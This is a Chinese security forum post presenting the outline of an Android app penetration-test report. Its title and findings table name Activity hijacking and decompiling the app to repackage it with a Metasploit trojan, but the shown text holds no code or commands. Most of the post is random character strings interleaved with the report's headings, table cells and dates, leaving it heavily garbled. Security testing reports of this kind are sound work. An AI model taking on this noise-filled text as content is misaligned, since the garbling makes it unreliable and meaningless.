找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4352|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
6 S9 U. b U* W 5 X- y1 o) t9 ^+ o/ v6 P

8 H% J- Z3 V, J; L8 N9 G 9 r t9 w4 T8 z* _0 h! g
2 x: ^$ H) W! t% G3 J. C T 5 ]- C: b& r' E

. T) o$ e& w% q+ i1 ^4 f: p # n6 l3 S2 Z) ~: }% x
/ d! |" \+ V+ U9 V2 M8 N4 { 5 n. M6 v0 n* I$ r) z: Y

, A# e2 w h5 r1 X* _3 ?. d9 @ 7 X+ i I: D3 t1 x, o2 V: L 文档编号:                7 C W8 g, T, Q& ~ , B1 l- Z/ L: I( U7 S! |

1 Y3 g- w+ _* S$ Y" l2 D3 @# Q9 p 1 }7 ], @2 q; w, u0 P/ w, z- `

- \1 z( O4 p5 e% M9 F9 g7 V' }+ {: w2 G0 w% r: z   ) h) h4 m; f' |& [' N# Y1 O q% D / Q( f' x) y: |* C" H, S/ C

3 N e8 Q5 u7 S q" T- U8 G : l8 w7 ~" x& }/ ^. b* T+ f& `

7 R6 G0 |+ }6 {! N 4 d2 C% |. Z- G   & d4 |9 S( }6 ~8 I; w1 b3 W 6 x4 H8 W5 v" U# Q8 S0 m3 p5 o

0 ]& F4 I9 C& i, ~3 \# h: j, v+ Z

+ D& o8 H. v7 ?! I" b! V 0 }3 E# H2 r& E2 \& r: z4 _   $ m8 w! O, o+ {8 [ k9 p5 g- b5 @+ a6 q. [

0 Z% Q5 `+ U# Q: e; K* S( F* Q2 x9 k) i+ u* |$ G

% J9 E( r& [) m/ u* f $ q# B1 c* f1 ^, {/ g d   $ n0 T Z* y) T" P% J S# \5 q ! G' H# R Z+ p4 a; j5 d, H

0 `& I( j% Z% a! Q* Q. |, k& P. i' W * |* C4 j8 j+ Y8 P

' [0 D; O& a/ Z0 g# h) [) ~7 o5 F; ?) X9 I6 b   & E7 o1 C& a; X1 a! ?" s3 H0 z2 T$ G$ X' m4 f8 O6 k, W

2 N- t( N t3 Y% Q ! l% Z D: }. Q3 J& P4 N: b

2 q* D: S0 p6 k; \, H# D ; U$ d$ F9 j- g& p9 ] 某某某APP渗透测试 # u% F) t; L0 y( L6 N( P % W) P( W# A7 Z7 I% d/ s

5 K/ i7 f* F! y5 Q4 g4 ` . f9 a& s- ^/ M' G- M% |

( E k7 |* I: Z8 ~+ u( ~ s9 v ; z9 J/ [% z. }, F3 E7 r4 }0 w   2 H/ @# u! p/ [0 g$ A" K " {; j+ S- x! v" C9 Q3 ~0 f; V

* N' E# S( N1 m, o! e+ M 5 L4 Q1 _5 S: N2 }

3 s5 @7 z8 { G1 @# i, n I ! X! {; j6 n8 Y2 g   0 Y# [2 n3 x! @' Q: F ! {! J3 a* l) J1 f W

" |1 { Q: H' u: _ 0 s5 q! A( ~1 B# G" T3 t

8 g8 ]1 ^8 ~: N' s2 @7 y" ?$ @9 a+ I% g* W, h: P% ]   ) R& w* o5 k# v( \$ u# M* P* q3 i4 X, t! n7 Y, ]

# c. l7 d. t% x" l! Y. K' V$ K & o5 L& ^9 O" m: k

1 s5 M, j( R- k0 _6 q0 @3 l $ w9 K5 U3 r( O, M$ a/ Y4 b5 ]   ' q7 h; D$ |% h/ }7 O: j- {# t, I! e7 E+ _, E, `# T+ Z( X1 e+ X

9 m! K o% ^0 b+ L ! w2 F; e& ]' G# O- F' Z& s+ ]

) y0 D: A: p& F2 Y# b' t* c, y8 c) S+ T8 S0 L% y0 O" p$ n6 ~ 技 术 报 告 ; j! C* o+ \" E5 W! y+ p. f k / w7 u6 z+ e) m+ Q E9 X

6 E7 |9 `2 c( R5 X5 U( S$ y4 M9 x ( [3 q8 i( K0 u+ a

6 ]9 j6 }* U. ]! I+ ?" k0 E ) H3 U/ z S% I3 C% n   4 A" ~: n' o; ^. G + y7 t9 d8 V$ c9 h

! u# C& g% H& F, D5 H ( }1 F3 ]+ P6 [0 b9 O

( {2 W0 C. V$ o# T4 l " z. q$ Q' E" I3 S: G! e   # J* y/ j3 p3 J2 _- x ( U/ @1 w/ W1 T5 g3 e

+ z& D0 n1 J, D* }: H" r- J' B4 q! H6 U

+ O& ?3 t2 @& m+ f% g1 J 4 ~: ^ Q8 T1 L# e5 U   * j# y B- h, i# W : ?: f: ^4 y3 W5 _5 Q) Y: i8 H

+ d5 ~% C7 P7 \, F) J7 ?( n " |1 z$ \) ^$ s7 @) I1 Z

/ T: N+ Q/ s; [0 O% R2 U4 s5 P ' r1 ^ r' m# A) f   4 ^$ p: y8 g9 { x. {, Z2 Z1 ]; J( w5 Q

4 y2 U; G' G- V7 ]* v& d 5 i1 p7 G/ [/ j- P

! v* L! E$ Z, m' ]9 j % x4 {& j1 f3 s0 ~; v! s' h   T( g) H& V( p$ ?1 ^" [+ Z- r : z; l: @$ S) D! A

/ |! x% ?" C/ C P8 y0 ]: B( M* a

5 [1 a& W) F4 i4 x& n 3 T l7 b8 A. F% v' v |5 t2 u$ S4 B   % G2 ` ?# `1 ~- z( b- l7 {. X$ h4 D; R- R t( N+ ^

4 C- N1 v9 K! x1 |% F7 }9 U 0 j( d: S5 H+ s' Y8 @3 h; m+ m" z

Q; Q- S" ]: {9 m+ ]* \6 ^; }2 @" f   2 M* x+ `! E) j* l6 J3 a # m* b( n! ~* {7 n! l

! Q7 o- C4 Z* s' o" j + \# Y0 r; Y; X5 o4 t9 U) ~! [" z6 I

2 f* p( I7 x8 T+ H1 i ( S5 n- Y8 W+ z* g3 v( j   ; G( K# P9 @0 S: R, }# Z / o; W; l( Y) L$ E8 y. i

. |7 V: k2 a! c8 J4 Y+ v. Q6 R : ?( {$ e, n+ v% D

7 h& p9 u5 V4 B* h6 D3 Q: i2 j) t" m8 b; Q$ A+ Y   3 E6 p0 @! I7 _ {) j# B # ^) A) E. n% r$ e0 s5 c

8 B" C9 C, a5 z T2 X % O1 G. X6 N' [% E

8 D4 X1 R- F( F- n) B 3 l. z2 E$ }4 D6 ?" o0 Q' s3 o$ Y   : D; a) @+ c) X- A% w8 \- n/ O0 t5 A0 i% n% b5 i

/ l( W$ \, d4 v1 \' x* f7 Y& s2 t ' _7 L9 M2 t/ a: Y$ h7 h

9 K6 x, o& [6 o6 i* _$ a $ F$ A4 m5 l6 Y; g( W1 \* @   . j( `/ A* z3 n+ {9 P/ D9 W! j. {" H7 w/ k; f( |

% R Y6 E( ^4 O0 P8 C ?% M6 h) o! d! P

$ P+ p1 T; c9 W" o$ v+ s& r# ~8 C 0 K& Y$ V* ]- g; m; B& l5 y' ^/ k   $ m" G n: ?& _2 f- V - d' [ ] Q% D

" E: q5 N8 i! q" ? ; W$ O( B/ i3 t) l

: ?7 [' D$ P8 k3 m7 ? c, S" }- i: m ' C5 b# I$ g/ ?3 {7 b8 a   , M# F! ^. J: A0 P9 e) b8 X 3 X8 {8 b% f8 _7 @ R

q/ G8 E! j1 w4 |% _- g5 Q) ^ ; w `7 T( S: d' c- M

! \$ X& z# h' F8 B2 Z+ D ( E1 A4 S, c* I9 t- T3 ?, `9 q   N! u5 G5 L$ A) U; G* {; M : j) d- j6 q+ @ b- W7 l/ `( e$ Y

% A; t' F" N% I& Z " J; S% I1 |! i" |+ N/ K6 E

. Q) }5 J4 h% C m: v" K* T 8 |. {* a- q, X5 H4 M   & f {; F' S3 ? m1 _ ) `" U3 k- P/ j

1 k3 U! `) B! u0 r0 L. R8 @ 8 E% H0 G" e) r7 S

- @$ N9 h" `) B: }) T& f; y ! n1 Y! Z! b* S+ @ [   + l7 L( l* z; M' A4 r4 r# ]* } 9 P0 ?2 [6 w4 u. j6 i6 E0 D- U

: K! |; h3 {" S' E0 r 3 q+ E( H( C6 z+ s& v% s

! \" g: p; w0 Y R; k( [" v* g4 H7 c0 T2 C! e+ k) p4 i, P   ' U% t: T8 j& n8 c 4 X8 L) w- |9 b) A. ]

) M, U- b' g) r0 p9 @ {7 Q Y " @3 G6 ^3 Y# S; a/ B* i

. V- R+ k' q6 T + d- j& o6 f: A6 H, j! Z   * O0 ], H D2 Z8 M* y/ [1 K1 T / z- {) w5 m- N. M9 c

/ k B/ G/ I* ^2 j2 }4 U 8 H: Q1 G2 L8 r/ a' W0 x1 ?- a: w

- N* ]( r( ?) ^! ] ! e; V1 C$ S6 V) T. O 二〇二〇年 $ ^; n5 w n9 Q" { - ~, c( H6 H4 w% y

, ^* O$ s- [; Y/ f ( ^4 z: v9 M, t
& C" X! ~$ N, a2 u ) I! _5 k0 O7 S* x, t
$ V+ c, x+ y- A' P7 Z. w/ s2 J/ G9 h7 V: W3 T ' D( V! V a& W / l0 B& p* _$ d0 p
5 e+ Z6 U" ]2 H9 U. V- C3 [5 n' _8 S" z& b' F' t- x3 t
K, U' D& S- f ; `. o' z2 W( [- A
/ T2 K7 b7 G# d5 ?! D . Q6 B- ^* l3 r2 F. r % E1 ^, d, {5 c4 M0 ]# Y; [7 b7 _$ w2 J) W
2 d& P. K0 B A% X3 n- S ! L8 x7 h/ P& [) y; ~& q5 [ e" ` V

* b" _ J% m2 S) C# Z/ a ! y( [8 U- e5 S9 @+ ~4 m/ ~5 N 目 录 5 I, u( g0 f- v Y4 v i" q3 P1 F : ~6 X v. z" V% H

% J( a" Q; t5 } D: P `' T# Q! }& D( p5 N3 G' \ & j# C2 y# C4 y3 e* \+ m / s- J( |# c4 A* M6 C6 w( q

" x5 B y c8 h6 A3 k - H1 I7 w; i {- m+ ~   9 E' R4 t9 [* [ Z 6 l/ y! h; T- h- f" a

|9 L+ p6 Q6 U8 D- t+ s& f ; }0 w1 ~: W6 ~- {8 x1 j; v

0 F; E p; J: |( p2 ~, G7 Z- Y, m. { 1 概述... 3 8 N6 D! X* O' a/ l8 S! m - Q+ ?; P, h# K4 _* P/ a/ M7 C( Z

2 e& R9 T; j) R: o5 W 4 V$ n- w1 G1 E% m8 ~( K/ r3 G) R

+ W2 A( _' w i7 ]* j2 z 8 C0 P6 |. S) f1 z, i) \ 1.2测试时间... 3 5 D6 B ?8 q! ^$ B* ]+ a7 `+ f% ~4 d) u8 }2 l0 q4 V1 t1 {' Q" _

% H5 [8 p6 o8 S* U $ M9 V. i4 h; e8 Y* ]# y

- P& N& I3 c" m4 p+ D & Q% r6 G! \& w% ^6 p3 N$ I 1.3测试对象... 3 $ Z! G; H* @4 ?$ G, l; U 0 X" V$ O: {, {+ F, x, E3 H* H

' U8 d* s6 h1 m5 H , j0 w3 C* q4 _1 h; w6 C6 ^3 G2 k

" u+ P, @) C; n$ B2 z ) {- L2 c- i" D- h 1.4测试结果... 3 : j6 @6 k) j3 o7 g! N, m2 Y+ g e2 {9 K2 B4 l# f4 ^

5 r' `, {9 u6 R4 x& Q8 s 3 |& `- y+ x2 a( u! s% J9 M1 x0 c' F

- M0 x; G% t& [ e ' L& T* V/ H. G 2 检测结果... 4 8 }; g+ x) s4 x% Q& A4 ] 8 p# l- t! y+ v; P; B

" l0 [5 C* ]6 X5 |% i, n+ h . |. @1 v" d! _: f, G

# s1 R' J* A- `$ T L: ^% [( ?8 z# ~7 c; e6 ~ 2.1 某某某... 4 . e2 d! g0 `. L$ `& w3 V2 k ! f" |% ?+ G9 r6 b

: Z. m/ R4 U7 X: b1 [7 S' b7 m5 Z4 V! J% ]

! R0 q, L/ |5 V5 S, k - {/ Q5 }: D" I% p! t' ` 2.1.1检测目标... 4 * v4 @5 D4 h3 E) y9 v( A5 T ) R% X+ R" w% }( U9 x' _, }8 F# T9 J

2 z- s; a1 E6 ]+ Y3 q 3 h) ] z& v1 ?4 e) \

7 `" F/ n, M" m* e5 m % Z9 | F* l) u# O7 ^( K 2.1.2检测结果... 4 3 o' N/ F6 ~' O, c% f) D! n# X7 C0 E9 a2 \6 c5 D6 I2 m9 _# z

! C, @% G: S% Q+ S) m3 Z. c , s2 W. E% O* Y

8 m# ]* C" o9 U5 ]; {# g1 d # K4 k& i4 s" G! L 2.1.2.1. 4 4 N8 ?) b) h M* H+ c4 z! K3 q Z5 G& ?4 a' v" ?% S, f

; ^) j; m6 V# w* U C8 v2 i * y# f* ~1 g! O9 C. ^

+ d X9 ?* M4 t5 V * X5 ?0 w3 M, [' n+ {& n 2.1.2.2. 6 + E5 [/ D/ l) ]0 x * A0 F, A+ {( I: B3 u& B ~- r

6 @, i. v# x+ e* C9 J ; t. U8 b% d" J# `

* T2 Y, n1 S" s0 e% i. p 2 Q5 } E+ z" X4 ]/ M6 t : S$ ~3 O' @& V; v+ q! X$ ^' L$ X9 k. n

; a2 W. V/ J/ f$ R* y# I % S# p& z! Q1 c6 T3 `3 Z7 Z$ w/ L. E N: i9 D; h7 K4 e- ?3 e : a: B, |; W7 z0 Z" J% h
0 k' U, n5 d9 D' @( Z& C8 w" r/ j* e7 K$ Q9 Y
% L3 d G; x0 X8 A " W+ Z& `1 {% l' @. Z# L9 x. m! R 5 r' \! t" u I$ ?3 N% J- f7 [ " x8 `0 D T& a; |

* Z' G, z+ [5 j* P ; H- \0 R. [+ ^' H/ C 1 概述 ( R( o4 @6 T- ^" q: C : L% ?; b* ^* U4 ~: ~/ o

7 ?" }5 m% p4 G) ^, u ' X: R7 y0 }9 H& c4 W6 a

! @ x. `# m" X. I9 N0 S5 @' U ) E/ k. S: c7 @" E; A* `8 ` 1.2测试时间 7 |9 Q9 D5 |& ~( a& {( J1 e2 |0 w% y/ L0 X$ d

( x' i3 j2 A7 p- k! t+ G7 }( U! V& f: v3 P' J4 y + @1 }# [- d0 b3 ]8 X6 e* ^0 a: L6 l. s7 T9 q A1 q4 g! c6 z/ s- c3 _7 G: r3 y4 l4 ^9 C+ K8 F0 M2 R O+ `4 }' n9 i1 R3 ]" L* s( v' s9 t! A+ p+ x, P% T; l7 Q6 J2 q& Q! G$ q' V6 M3 B1 |, K4 J* B" z. ^) b" ?4 B0 @+ _* W( q+ s+ I* `" S& ]) V4 W: I5 m6 ~ h6 a9 O9 q6 ~) M$ j# t( z( Q1 L& E& Q4 H. Y3 I5 s g( B0 H& R0 q' k! Q% k: T+ z) p. f c) p: E& a: {: B4 }; ]: |' [ t4 H, p6 T5 W, q9 Z" i2 v; K0 T6 Y" f1 S7 Q6 @1 X+ ]4 V3 K5 E( O( ?- O' _2 o: N5 F& D9 k5 e) R; y: R7 H4 Q# `7 h6 c' @& J! U9 G5 \& Q1 g' u. v$ Z: B! B$ N ^( v! w% U( d) K. u- u# K) o h& t* G9 e$ n+ e; r( p9 b% v, r7 |0 k4 m: R- U: }5 }' Z+ B+ v! j) {6 E$ D, r/ i' w8 A% ]" J+ { }6 L, x1 t+ O H! X7 l
# ^5 a9 Z# d, c, v/ F6 x- w . o) C, I! g- k" Z7 A- b

* F) d+ B0 ?: |! h$ c# ~ 5 e. P& x) J* w. S 渗透测试时间 " @" W, B. F/ k9 [3 N ( b0 b2 X6 u3 f7 r

7 d; _3 G9 Q; g' W, X7 j4 y* B: y2 I- J/ a. v# K! F. B
# j8 [, c/ E; S$ v' \, P " l* P- V8 V* \4 W

3 h' w; s& N' h 1 x- o5 R# f! w' P7 A9 H7 ` 起始时间 : ?' }" C0 d6 j$ K% B& F7 r) `( k8 a

8 d; f4 f2 m' ] L/ M: N w3 m ( g4 r: i$ H' [9 C5 q1 W 		" s6 q6 A% N: K9 J$ b3 i 9 ]- s% P" e3 l% q8 M

- m4 b1 r* f3 D) L& G ! D! \+ X# n+ L- c0 a; {% ?1 X% f 202046 ( m; S. g) B( p+ ]- P/ ]8 j; p+ G0 z, c+ d& s, C. a4 v

% o g/ V- }8 u9 f! u + w9 I/ |4 n4 c3 b
( w2 z0 a% o8 L3 L8 i% K* c( z+ X# S5 _

% n# g% z; M) [: ] q" n$ O9 c# ]2 \" A2 ^ 结束时间 & z R+ h$ F% c! K0 _* L # }, q b+ h# X5 `

/ Z- H$ w: A% J O! q+ S% d* I 1 F" S9 M1 ?) M 		* J U; z, Q2 T9 R- i 3 W8 s) }( r% a. w/ [

( J, o3 Y+ a. ~: E) H. t- V. Y) r5 V1 A. p* t+ L9 B 202049 5 `5 L8 @6 l! {6 u ? 2 J; S4 c' s; l( y

/ E# i& P* `3 q3 t8 E% Q. x/ u( s% s: {5 `- B* k
% K" k3 E1 G0 G 2 v T3 z6 Z4 X* S/ Z7 W0 T& `

3 l3 M6 ~# s# F7 v2 }- G: P- O% H- y4 |. W: d% j7 S/ ?4 X 1.3测试对象 9 Z4 C6 T0 P/ w; ^ 2 ]# n% E6 s5 A8 |6 E8 `1 V4 ^

9 F) ^6 K% e+ P5 f$ b9 j' e: ^- Y0 e) v+ J n. J0 _ S

6 Q1 d- T/ a" d! O. L8 L $ i3 x8 S- S/ G/ ] 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: / f/ g* i6 p) T ; J1 g ^6 |- I# P9 U# B

% Q# d- H. m% q8 Z; Q# J' ~ 5 i& K# M9 c2 w t/ Y. K/ U0 z

3 k" m9 O' A ^" q' X) q; s9 e( t2 d; K% ?3 j& K3 [/ U 1-1 检测对象 ; N3 @$ a y+ t8 j) `/ e8 M% n2 Y9 T q6 l

c3 m% s& s1 U, x( `- ~% s - y9 V1 J8 A. | " U6 N( [9 ?: h. O& {. i; T: t/ Q+ R5 d0 \8 c. T$ Y) ^7 j" x8 A, X9 ?( C3 [0 a9 A* _- ^, v3 s( V# [5 |7 x- U5 u! `6 R/ k# u" H6 w% O& Q- I2 y1 v- `& Z# x: |; X2 S9 Q2 @, ~+ t7 J, `4 W5 }2 m* A8 R- S |1 u9 J0 o" L- V! Z* W6 e+ B; H. C R2 z3 X8 i2 h! t; M' I2 `4 r' L0 Y, r2 ]4 E0 t$ }* U4 L, N" [3 g7 W% i' N- {2 Y q. g) e, h4 v7 K I7 _$ @4 b& Q ^- Y' \ P; y' v" W6 c8 |2 M3 {, C" ?- d; U+ D: _1 n2 a. ?! k8 j- g- M {+ x4 H* H1 A: `- f! F: d$ Q+ [! W% P0 g. A$ B' k8 r5 g2 Q7 k0 n" X; p; r) ?6 m* E3 l3 e" O. g0 g; x7 d7 {4 x6 x% _1 k0 m1 h4 n7 u' m! `$ I7 u) q' Y* b: _% e% n# A2 L! f4 e- B. x3 O3 F' c9 c3 U- ~% F2 g/ o2 g. K2 z6 @# X# ~/ m, T8 ?# w& R- E5 ~7 Y
B. P+ X" \ m" O ( p$ J+ ^2 d) ~6 Z5 c. ]4 q4 H R

/ Q1 I# h5 N( I+ S4 E " p- n4 {5 k9 i. i 序号 & Y7 _$ U7 t9 Y; r, `" P & X6 P: t8 W# r2 E+ u) E5 Q

( N2 X! Y- }7 x1 E3 R ) z) t {7 R) f6 z# J+ f" H 		! R- ^+ A2 t" P4 @6 q + w' t7 j2 k4 b4 p

) w* P- z0 b. O1 ^- Z 6 x4 S J8 X J, r! k# {; q* v 测试对象 6 X6 g0 U0 l0 I3 ^ ( A. w- k/ }: U5 J! r4 U& G3 l

. ^4 [+ h7 [5 t$ W6 w4 r4 }' W1 y 7 u0 ?" T( v) Y Q+ W( |$ g2 y 		# r- Z8 q6 c7 M Z& Y$ \) U0 E ! \3 ^2 Q8 q$ { h

% y& P' h, z* _) Y6 I 3 ~$ r. ?$ ~5 R! j& W 测试地址 " M7 K! ]& P7 \& Z* G9 M " t0 q8 f3 t" R$ v. d, v$ p

$ ]0 M4 D; C$ n1 Z2 P # L% O% o0 X' Y @( J, b. {& E9 x 		4 h- e# P) A" ?3 l. @# j# Q+ C2 U' w1 q# }2 l8 p

( q# R0 u2 o1 `* {/ E, d. u2 d 5 e6 t8 c" Y. Y- L$ s0 o8 ` 安全漏洞 + K. k( c' v( g Q2 F* h9 C9 p- w# [5 H, I1 W3 j2 l3 l F3 Q

3 V$ m/ z, a" l % W/ s+ ]6 d" z8 G( a
4 R. P0 X- S+ c) k3 L) ]& A6 m1 G$ H! j- V/ v( r. y0 }

& ^5 S% X/ Z8 T 3 ]/ j! o! p& }* o4 T$ o 1 & r# K, ]% S) { d4 _# u ) p) \6 t" k+ V# x& _

$ I) H! U2 v# P( M6 y* |2 L. i : T3 q9 ?2 J0 \: e 		) j. k) \8 Q a. P1 @6 c' s# s T" B- n% \, l1 S

! M* e3 U8 I8 t4 ^! w: |6 y . s* a$ x, Y, j! o 某某某安卓APP # r9 a1 _5 D4 Q1 N1 R 1 L$ W/ g# H6 `* z3 J0 S% `1 ^% m* @

; t" H8 u/ A* u + A6 Z. H% r1 N8 q$ } E 		" ~5 t4 ^) {7 k+ X# \/ t: i$ @ / c+ n4 D" T3 I, r/ \' \" h

: o {) r* m; m" ] & o2 J5 f% I3 y, ?! K   1 g- R M& i) C1 X% f4 o ' T! Q7 O+ R" O2 R1 Z6 h

: W" k3 I$ a3 K, {6 f( \9 _5 |/ C% t7 j. \. n" u4 A 		5 @! W) p& u3 ?' P+ z* [' J5 o9 ~$ G. v+ w& {! B, b$ C9 \

' Z5 O- J, K# a! E# f0 p. v, s7 c$ n h" q$ r' V 2 0 r6 r H' G4 E/ B: ?; W, j' ]" H# v( P

+ H; l% w- {; ~ " |2 s& ]/ [% X7 h
' Q: U( S0 d7 R1 @# u+ S" P' G + m+ L* [5 }8 Z% t X+ H

7 p* }6 ~8 G$ g- B. i5 E- C# w0 W 5 D y$ }( Y+ V) Y: y% k 1.4测试结果 4 c5 r% E% l+ \1 T. S: J. |3 x/ L 6 m9 W6 v6 P1 j; i0 P* G

% b* z7 N* q) k/ C8 I, E/ p# T M% D+ s8 q) u. W) Y+ J

! H+ U6 n, c9 \3 {( w + U' K6 _# L' O* \% L; s 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: % A, A \! u T' P9 U9 h; X 9 I+ C, q9 S; s p- q' }5 T

2 w) s G( b$ e+ W4 X 4 O# @" p2 w( X# }; |

; ]- ]) D# [# e4 z# l ) ~& z4 m; x6 B. j1 u# `   ! ^5 `, K# o" G* [$ V6 U G( c4 u" D

2 r1 Z1 j+ J+ B( t2 }; ^* a+ U3 n; G) j& E0 t b
@% S0 H9 F/ I" G, E6 U# i , m4 r5 X+ n6 i" D7 D . v& b4 {( d0 I/ l# l% C" ^4 O0 [4 X' l; I. s, i2 [% v+ L2 y" [2 k8 G4 w6 U4 K( |+ Q* m+ K7 I. d2 \4 }* \# K! Z5 p) n3 ^* u: X! p; |! I+ l6 x- i. a" h4 R- |% m# q( b" T* z {* j5 c8 F3 c% V3 R6 K) M, c& E S+ ~8 h7 G) V' Z D9 e% Y& D6 M% \& n4 d# y# l) U( W, \! z. f) @. G6 r( Q, c8 k: K: r" p; d+ z2 R% m1 P7 p& a. i' N9 j" u0 T0 N7 g" J1 \4 j" J, F' ~$ l( t" \9 k4 P8 ]- ~ p" C4 J$ g1 S1 `$ v8 L( t4 ~! W1 L4 x" P* x# j, E' b1 ` z. N! i7 [. R$ k) L( _, [" j% R2 ]& B! \+ J& {8 T+ ^ y6 y9 {: Z6 b2 L- T4 G' @( J" [2 \- C9 A" ~% t2 l) P, Y2 A5 A/ G0 L7 b5 @- W9 g- [% G" Z6 b- {9 b' y* M% @* U! I/ r% m' C4 k8 t$ g# X3 @) Q5 Q7 I# s% A/ t: t4 _0 L& P7 Z7 T, B; g# B+ |& {7 ~) r# n. p2 W9 }* C# i4 s" N* l5 x" q* M& n" R: M1 X% B. p5 e) }9 e k3 x# p& p9 j3 [8 S7 T! o# s6 i' ?0 p. b" c: E& e ^0 H( _* Z7 p- x$ q' G# C8 m7 g9 Z$ s2 n+ s, n( g" ]* \6 o+ B3 l! g- g; W2 D# l) I" b3 [3 x' W: g# W; R$ q2 h) p4 ^ d/ S' j$ G# U8 S% E" i4 s, w. G v/ Z! W7 r& p5 O% D5 c2 } b& x, I/ ]# j3 `" M+ d \$ G+ y9 N' G- U$ x3 n* U( ~) Y* G+ i. C' ]1 f6 L! |' ^* ^! O% ?' s8 O- A* I! P* }1 L9 k1 O% ?0 Y( Q r% g( b- _( f2 O; J# }, r4 }; O. Q# |6 z' [5 F+ y D. e' I" a8 z! Q
- T1 U' n n" U0 T6 @ K e; N( `6 U4 P& f- c

' \1 J6 l. A6 I4 |, ^- u: q! W9 q5 D 序号 . x, z# Q8 W' F; A: ]6 J4 @/ \3 i( ]) z

! s& E9 s% a7 C+ S: E8 U8 F; b6 z6 i. S9 L, V# s: L# I 		- x& z2 O) \, S+ E + C+ b; q3 \1 ?& K

! j, ], f8 `# M. K% ` 1 v0 |7 Y y5 C6 D ]' t 系统名称 $ }! Q$ C, W7 F. ^ Q K; t/ V! A' Q& p x4 x

5 |+ Y8 O ]6 n; k6 U ) V+ ?) V- e( l: S( u: x 		6 k; d/ q2 }) {1 W! x+ O 3 O8 c5 t8 {) b1 z

2 l8 d5 }& C, K6 f 6 Z) [3 {. T% g' n 漏洞名称 7 g% y# G( V9 g7 W ; o) S8 \# m4 \! v0 i& K3 }

# {! ^" g1 \! v% e; X3 v( s1 U6 q3 m4 ] 		; L! Z! l8 r+ r4 {- H2 B3 i- X: g" C + o* ~2 W; d0 Q" n

$ T+ A9 H# @2 H1 s) S6 F# Z# A3 o . F; \8 D$ ~9 ~, X! B 漏洞危害 : @9 ?9 Y/ t. o1 g 0 V3 q. ^) x$ b4 p

2 Z9 o4 [, ]* M" M- Q0 V0 ?! j" U8 I6 c$ z5 t# ?0 ] I h4 o 		0 {) ]& Z& p8 t5 w% w2 ]+ v; M, ~5 I 4 y) |3 x! l7 Z- S$ e

; i! @* J% j- c9 K+ x/ X4 h6 G 修复结果 . J/ K. H5 V2 y8 Y0 S " |8 O/ g- y0 W$ e# k

' ~! h% u: J3 p( T/ S6 z0 R ) Y; e2 c! z9 w8 V: X; k
: |( ]5 d9 M2 X4 j& j; @& `. A( o. z' |: b/ q2 i) ^

# Y( D8 G/ B0 N$ i4 Q8 Y% T7 i' e. ?6 ` 1 : E7 p8 i0 c/ k4 @ ) y: f- l4 c6 e' i

8 b! F! d: T6 P D) z: z4 O- b0 y6 |. I# m. h 		8 p7 |/ z) [' H( e/ `0 f3 r# x: d, b( [) ]: V

: t8 f% { M& I* `2 w. _4 j / [/ Y0 i; a* [& ~( R# o$ n 某某某某某某APP ! z, n5 U2 K p+ a9 h ; p, ^9 E7 S) t

* i; O. W7 x) v! F" W6 X* o8 p , n, g8 |' g3 ~ 		4 T2 ^7 }% R6 l2 g: s9 P2 | . z- q6 S/ \" M" A" s! M. a

2 E: x* D0 Z1 [: V4 L* r* `; P4 k , J8 Z1 v: P$ ?/ V, ^ Activity 劫持 $ ]: v5 T( [1 u8 A [ 8 N" V" F# l9 _

: B4 K2 v+ ]. l$ t( A ) Z6 q$ O, O% R1 K

3 o& P4 n3 X: F7 m V3 t . e* g! r. D& ~# F# }5 {3 }   " a+ y( h" d; s* K' F" }7 T3 V& S( T; Z( i1 f

1 i6 |/ K7 W8 s8 j2 C6 k " L# \, n, a& p' ] 		. b O8 B: V: a+ c " a, c- n! n, x/ L7 S

W4 X1 a% X6 R; O& F0 \ j 8 `! Z- D+ r( n9 n! g& i) y . L- o2 [4 k& N/ W- [! P: T" { # I' F4 K- t3 ]: @- O& b w! R0 N7 v; f

7 s9 l8 @; F9 J' N3 O. l; X 7 B$ f$ ~( J/ S8 D' b) z 		@. O* K! c: R) t1 Z 9 M5 C' J$ S% B, W

J ?% `7 G" c / Q6 q. L9 U6 x3 C* r# p- E   - }* x$ p" p" k1 z % ^, s( B$ F2 {$ J* D m) j7 i

& x; G% Q! y6 ]5 ?: {: S V. W6 P: c/ W9 r) H8 i
u8 E P6 {4 c: M, n; B2 p. a S# a) N9 }. T1 H3 u# _

/ M9 d2 C6 \0 q4 P9 S - `2 I& r! s1 a" q 2 7 l5 i. B t8 W3 s! U# I' o6 v+ V , Y& A8 q8 ^' D* u- s# I

9 [% A" \$ \6 A7 k. j/ W' V5 o) g4 l, f9 p6 |3 P 		j$ L1 \& c* W4 f3 I* {; v7 T( \; |8 F3 q# H9 _* e

0 m$ f! n; _. b, f$ ?- s( }& k1 J6 I5 }/ J* v3 S 某某某某某某APP Z, J; q. c( T' M' K& Y. K1 ] , k6 x$ f8 B; x0 r5 B7 e$ l& C

1 [; }1 I# _& l Y+ c' R; ~ ; H6 k( |3 ]# d! f+ _ Q- B 		6 ^( x: n* s+ U. i3 x& o5 G# v/ j# [5 w9 }8 U s; ?% ^

5 q4 b7 k, R5 r) w2 j: M F P 2 X, m" t. d6 V& D 反编译二次打包捆绑木马、篡改APP代码 ' B, p+ r0 z H) |8 b+ q 3 O6 I: z0 o* M8 Y! l& J

( @) v3 j' u G0 s% G$ W 0 v( f' \" l( E7 V0 R 		3 w/ O/ M! r3 q) m. b: I! i. b: g% Q; D- ?* s* b

% e/ [! \, [$ M/ F 9 [2 k7 s% I+ v2 d % S1 F% u; l2 I$ P7 w 1 D! B8 N, |2 U" e8 S

1 y, |. K! h8 L- L) q " G% }3 L# S; a" _* D2 P* T: G 		$ L- s% U" H) E4 `% J& v ! H& n Q: g2 ?! `9 ?2 V( R) X8 m# r

* A+ m- M" \) L* Y% ` 0 V) m9 e3 F6 _   ) w; }6 f; L8 j" p9 K3 Q 9 _7 M+ N B7 `3 P

! z' G; _7 T+ S" {" | " N! g: O( u3 @' q# W! y
$ x* c0 \! g; L1 D$ {' f " `) i; n7 W( C: l+ m4 x
+ l4 H/ q0 ^! V# D; G ( D' v* u( |% C- c( \

